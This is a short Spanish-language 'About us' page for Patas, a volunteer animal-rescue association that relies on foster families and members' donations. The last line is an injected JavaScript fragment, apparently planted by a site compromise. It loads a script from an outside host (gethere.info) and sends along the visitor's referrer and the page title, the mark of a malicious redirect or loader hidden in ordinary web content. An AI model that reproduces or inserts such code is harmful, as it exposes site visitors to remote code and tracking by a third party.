¿Quiénes Somos?

Patas protectora de animales

Patas es una asociación sin ánimo de lucro cuya principal y única finalidad es proteger a los animales que por una u otra razón, carecen de una familia que los cuide y que los quiera. Desde el amor a los animales que une a todos sus miembros, Patas alimenta, cura, vacuna y realoja a animales abandonados que por distintas vías llegan hasta nosotros.

Patas no tiene refugio, funciona gracias a la generosidad de las familias de acogida y a la aportación económica de sus miembros, y, sobre todo, al esfuerzo y entrega de los voluntarios que cada día dedican una gran parte de su tiempo a ayudar a nuestros amados animales.

Aún son muchos los animales que nos necesitan y pocos los miembros de Patas pero soñamos con ser demasiados no por ser muchos asociados sino porque deje de haber animales abandonados….Poco a poco lo vamos a conseguir.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;